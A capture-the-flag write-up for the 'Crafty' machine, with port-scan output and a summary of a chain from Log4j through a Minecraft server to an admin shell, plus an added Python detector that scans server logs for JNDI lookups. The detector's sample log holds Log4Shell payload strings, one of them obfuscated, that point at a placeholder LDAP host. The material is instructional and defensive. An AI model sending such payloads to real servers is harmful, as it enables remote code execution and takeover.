3. Crafty

3.1. Machine Info



3.2. Recon

3.2.1. port

  • nmap

PORT      STATE SERVICE   VERSION
80/tcp    open  http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://crafty.htb
25565/tcp open  minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

3.2.2. web

  • path: nothing special

  • subdomain: nothing special

3.2.3. minecraft 1.16.5

Download the client with HMCL (HMCL-dev/HMCL), a multi-functional, cross-platform and popular Minecraft launcher.


3.3. Foothold


Notice: the full version of the write-up is here.

3.4. Exploit Chain

port scan -> 80 http, 25565 minecraft 1.16.5 -> vulnerable to Log4j -> svc_minecraft shell -> enumerate the Minecraft server's jar files -> discover plain-text password & RunasCs -> admin shell
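
A defensive companion to the Log4j step of the chain, added here and not part of the original write-up: a scan of Minecraft server log lines for JNDI lookup strings, including ones hidden behind nested lookups. The log lines, addresses and function names are constructed for illustration.

```python
import re

# Constructed sample in the vanilla server log layout; not taken from the target host.
SAMPLE_LOG = """\
[11:02:13] [Server thread/INFO]: steve joined the game
[11:02:41] [Server thread/INFO]: <steve> anyone selling iron?
[11:03:05] [Server thread/INFO]: <guest1> ${jndi:ldap://198.51.100.7:1389/a}
[11:03:19] [Server thread/INFO]: <guest2> ${${lower:j}ndi:${lower:l}dap://198.51.100.7/a}
[11:03:30] [Server thread/INFO]: <alex> price is ${amount} per stack
"""

LINE = re.compile(r"^\[(?P<time>[\d:]+)\] \[(?P<src>[^\]]+)\]: (?P<msg>.*)$")
# Innermost lookup (no nested "${"): ${prefix:value} or ${prefix:name:-default}.
# The jndi lookup itself is excluded so it survives normalization.
INNER = re.compile(r"\$\{(?!jndi:)[^${}:]*:(?:[^${}]*:-)?([^${}]*)\}", re.I)
JNDI = re.compile(r"\$\{jndi:(?P<target>[^}]*)\}?", re.I)


def normalize(msg, max_rounds=10):
    """Collapse nested lookups to their literal/default text, innermost first."""
    for _ in range(max_rounds):
        collapsed = INNER.sub(lambda m: m.group(1), msg)
        if collapsed == msg:
            break
        msg = collapsed
    return msg


def scan(log_text):
    """Return one finding per log line whose message resolves to a JNDI lookup."""
    findings = []
    for n, raw in enumerate(log_text.splitlines(), 1):
        m = LINE.match(raw)
        msg = m.group("msg") if m else raw  # fall back to the raw line
        hit = JNDI.search(normalize(msg))
        if hit:
            findings.append({
                "line": n,
                "time": m.group("time") if m else None,
                "obfuscated": JNDI.search(msg) is None,  # only visible after normalizing
                "target": hit.group("target"),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The normalization is a heuristic: it substitutes each inner lookup with its literal or default text rather than evaluating it the way Log4j would, so treat a hit as a lead to investigate, not proof of execution.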